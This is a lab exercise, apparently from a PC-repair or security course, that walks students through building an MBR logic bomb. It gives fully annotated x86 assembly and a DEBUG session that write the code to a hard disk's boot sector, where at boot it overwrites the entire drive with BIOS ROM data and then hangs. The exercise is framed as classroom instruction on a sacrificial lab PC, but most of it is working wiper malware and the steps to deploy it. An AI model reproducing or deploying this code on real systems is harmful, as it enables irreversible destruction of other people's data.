Working complete PC
Student Diskette, "New Boot A Ver 2.0+"
Student CD-ROM, "Room 6359"
The student will become familiar with MBR installed logic bombs including:
designing an effective logic bomb,
building the logic bomb,
saving the logic bomb to a file,
deploying the logic bomb in the MBR.
The student will how to design an effective logic bomb that will destroy all data on the HDD and then use DEBUGto create the logic bomb, save it to a file and deploy it in the MBR sector from the file. The student will then boot the PC allow the logic bomb to do its damage and then reboot to the student CD-ROM and check if it worked.
Since the planned logic bomb will do largescale devastation to the target HDD, a ghost restore image will be placed on a lab PC for the purposes of development and testing of the logic bomb. It is highly destructive and should never be tested on a PC of any value.
After preparing a "guinea pig" PC run DEBUG and save the MBR to a file on a bootable floppy diskette so that it can be restored at will along with a GHOST restoration of the entire HDD if and when necessary during the course of this operation.
The MBR will then be modified into a logic bomb and saved again as a file with a different name. Later, batch files will be developed for deploying the logic bomb. The purpose of the logic bomb is to destroy the contents of the HDD if the PC is booted by anyone who does not know about the existence of the bomb and how to keep it from destroying the HDD. The logic bomb works by placing the destructive code within the MBR which gets to automatically execute when the PC boots up. The changed MBR code will proceed to overwrite the HDD sector-by-sector with nonsense rather than do what it is supposed to do which is to find and launch the DBR of the active partition.
The logic bomb code must do the following:
MOV AX, F000 These two lines set the ES register to F000, the offset of the MOV ES, AX BIOS ROM code as the data source to be written to the HDD sectors XOR BX, BX This is a legal instruction that rapidly sets the BX = 0 MOV DL, 80 This sets the INT 13h parameter to work on physical drive 80h MOV CL, 1 INT 13h parameter, target sector is Sector #1 MOV CH, 0 INT 13h parameter, target sector is in Cyl #0 MOV DH, 0 INT 13h parameter, target sector is in Head #0 MOV AX, 0340 INT 13h parameters, 03 = Write, 40 = 64 sectors INT 13 CALL BIOS INT 13h services INC DH Advance to the next Head number (INC = INCrement by one) CMP DH, FF Check to make sure it has not reached 255 which does not exist (NOTE: the HDD has 255 heads, they are numbered 0 - 254) JE (current offset + 4) Once this value is reached then cylinder # must be incremented and Head number must be reset to 0, the jump will occur only if the preceding compare found the value in DH = FF JMP (offset of the MOV AX, 0340 instruction) This repeats the call to write 64 sectors having changed the register value to point to the next head number INC CH Advance to the next Cylinder # CMP CH, 0 Cylinder 255 DOES exist so we check to see if it wrapped back around to 0 JE (offset + 4) If it has wrapped around to 0 again, then jump to change the sector # (NOTE: the top 2 bits of the sector number held in CL are the top 2 bits of a 10 bit cylinder number) JMP (offset of the MOV DH, 0 instruction) Otherwise continue the loop and reset the head number to 0 ADD CL, 40 This adds one to the top 2 bits of the sector number, advancing the top 2 bits which belong to the 10 bit cylinder number JC (offset + 4) This is done because C1 + 40 = 101 but the 3rd place does not fit in the 8-bit register so the result is truncated to 01. However, the addition will set the carry flag JMP (offset of the MOV CH, 0 instruction) This will be sure to reset the bottom 8 bits of the cylinder number to 0 and reset the head number to zero, then call BIOS to write 64 sectors continuing the loop NOP This prepares to hang the machine executing the instruction that does nothing JMP (offset of the NOP instruction) loops forever on the NOP instruction
Now all that remains is to enter this code into "BUG.MBR" and save it again. Start the DEBUG assembler with "a 100" then type in the above code, when a jump instruction offset is needed, calculate it or observe it as the case requires and enter it:
-a 100 0AFE:0100 mov ax, f000 0AFE:0103 mov es, ax 0AFE:0105 xor bx, bx 0AFE:0107 mov dl, 80 0AFE:0109 mov cl, 1 0AFE:010B mov ch, 0 0AFE:010D mov dh, 0 0AFE:010F mov ax, 340 0AFE:0112 int 13 0AFE:0114 inc dh 0AFE:0116 cmp dh, ff 0AFE:0119 je 11d <- 119 + 4 = 11D hex 0AFE:011B jmp 10f <- address of mov ax, 340 0AFE:011D inc ch 0AFE:011F cmp ch, 0 0AFE:0122 je 126 <- 122 + 4 = 126 0AFE:0124 jmp 10d <- address of mov dh, 0 0AFE:0126 add cl, 40 0AFE:0129 jc 12d <- 129 + 4 = 12D hex 0AFE:012B jmp 10b <- address of mov ch, 0 0AFE:012D nop 0AFE:012E jmp 12d <- address of nop 0AFE:0130 -_
Execute the W command again to save the changes. Now create and execute the code within DEBUG that will write the new MBR code to the first physical sector of the HDD:
a 300 0AFE:0300 mov ax, 301 0AFE:0303 mov bx, 100 0AFE:0306 mov cx, 1 0AFE:0309 mov dx, 80 0AFE:030C int 13 0AFE:030E int 3 0AFE:030F -g=300
The logic bomb is now in place. Reboot the machine to the HDD and at the point after the POST screens with the cursor at the bottom of the screen, when the OS startup should begin, the system will simply hang. Observe the HDD activity light. It should stay lit indicating constant activity as the loop proceeds to overwrite the entire drive with a 32KB section the BIOS code block at F000:0000h.
Interrupt the logic bomb after about 20 seconds. The amount of time that the average user would wait at this point before realizing that something is wrong, by pressing [Ctrl]+[Alt]+[Delete]. Insert New Boot A or its equivalent and start Norton Utilities DiskEdit. Change to physical disks > Physical Hard Disk 1. Then Page down through the disaster.
In the next exercise, an easy deployment method using a bootable floppy diskette equipped with batch files that can load either the good MBR or the bad one will be developed.
Copyrightę2000-2006 Brian Robinson ALL RIGHTS RESERVED